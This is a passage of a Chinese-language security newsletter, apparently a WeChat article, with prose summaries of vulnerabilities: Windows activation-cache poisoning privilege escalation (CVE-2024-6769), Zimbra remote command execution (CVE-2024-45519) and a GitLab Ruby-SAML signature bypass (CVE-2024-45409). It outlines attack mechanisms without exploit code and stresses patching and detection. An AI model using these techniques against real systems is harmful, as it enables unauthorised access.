	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DLL劫持和激活上下文缓存中毒是提升权限的有效手段：通过这两个漏洞，攻击者可以从中等完整性级别提升到高完整性级别，并获得与管理员相同的权限。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">激活上下文缓存中毒利用了CSRSS服务器的机制：攻击者可以通过构造恶意的激活上下文消息，使CSRSS服务器接受并使用恶意的XML清单，从而控制DLL的加载路径。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">ALPC攻击矢量是中毒激活缓存的关键：ALPC提供了一种跨进程通信的机制，攻击者可以利用它直接与CSRSS服务器通信，实现缓存中毒。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者需要绕过安全检查以成功执行提权：文章中提到了微软在2022年10月的更新中增加的RID检查，攻击者需要找到方法绕过这些检查以确保提权攻击的成功。</section></li></ul>
	<br/>
	<p>🏷️: CVE-2024-6769, 激活缓存, DLL劫持, 权限提升, Ekoparty 2023</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0b
			 Zimbra邮件平台远程命令执行漏洞（CVE-2024-45519）</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Zimbra 邮件和协作平台修复了一个严重的远程命令执行漏洞（CVE-2024-45519），该漏洞允许未认证攻击者在受影响的 Zimbra 安装上执行任意命令。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.8472222222222222" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8b66870e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuPiaVQlibRPticl7bosiceArnaXYYb1MvZjNmqicaVJory2w5gnq8nybvn3g%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="1.0972222222222223" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=29362144&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKue2CeQOtoia8C3p9J87tQqPNNfKIMxuDAkibOAvicpjczN3WFlepVne7xQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.8092592592592592" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=41520a1e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuZYuugUDRTVFnl55e78zK4KNok8a0WHn5DU5RlzGuIy9eUdgC60fLCA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zimbra 远程命令执行漏洞 CVE-2024-45519</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zimbra 远程命令执行漏洞 CVE-2024-45519</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuXEA1JnTd760okpHicd8JiavicBVQyxdnBj1tA4lRNu7VbvuHIoeKYnOBw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuXEA1JnTd760okpHicd8JiavicBVQyxdnBj1tA4lRNu7VbvuHIoeKYnOBw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525421221818582"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">及时打补丁至关重要：文章强调了应用安全更新的紧迫性，以防止恶意攻击者利用已知漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞分析和利用：通过反汇编和动态分析，作者详细说明了如何分析补丁和利用漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">配置管理：正确配置 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">zimbraMtaMyNetworks</code> 参数对于防止未授权访问和远程利用至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全工具的使用：Nuclei 等安全工具可以帮助自动化漏洞检测，提高安全防御。</section></li></ul>
	<br/>
	<p>🏷️: Zimbra, 远程命令执行, CVE-2024-45519, 漏洞分析, 安全更新</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0c
			 Ruby-SAML库中的GitLab认证绕过漏洞分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要分析了 CVE-2024-45409 漏洞，这是一个影响 Ruby-SAML 和 OmniAuth-SAML 库的关键漏洞，可以绕过 SAML 认证机制，允许攻击者通过利用对 SAML 响应中数字签名的处理不当来获取未授权访问。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e6eb4ebc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuutI40W546u6SXTTc6tK3lqEPXQIeDibCx6iadRLuf3N2NYPWlR86qcyg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GitLab 身份验证绕过漏洞（CVE-2024-45409）</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GitLab 存在 SAML 身份验证绕过漏洞 CVE-2024-45409</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuwicDEXaj9mH1plFbbZpLicKFKCCG37QLIYI7A73WXVpicneWwFyz5OQeg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuwicDEXaj9mH1plFbbZpLicKFKCCG37QLIYI7A73WXVpicneWwFyz5OQeg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848582828155248"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SAML 协议的安全性依赖于对断言的数字签名和摘要的正确验证。这些验证确保了数据在传输过程中未被篡改。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Ruby-SAML 库中的一个 XPath 选择器漏洞允许攻击者绕过签名验证。攻击者可以在 SAML 响应中的任意位置插入一个 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">DigestValue</code> 元素，从而迷惑验证过程。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GitLab 在描述漏洞时存在信息不准确的问题。文章指出，GitLab 的描述误导人们认为成功利用漏洞需要多个断言，而实际上只需要一个断言即可。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">提供了一个 Nuclei 模板来检测 CVE-2024-45409 漏洞。这个模板可以帮助安全研究人员快速识别是否存在此类漏洞。</section></li></ul>
	<br/>
	<p>🏷️: GitLab, SAML, 认证绕过, 漏洞分析, 数字签名</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0d
			 通过iTunes利用的Windows本地权限提升漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
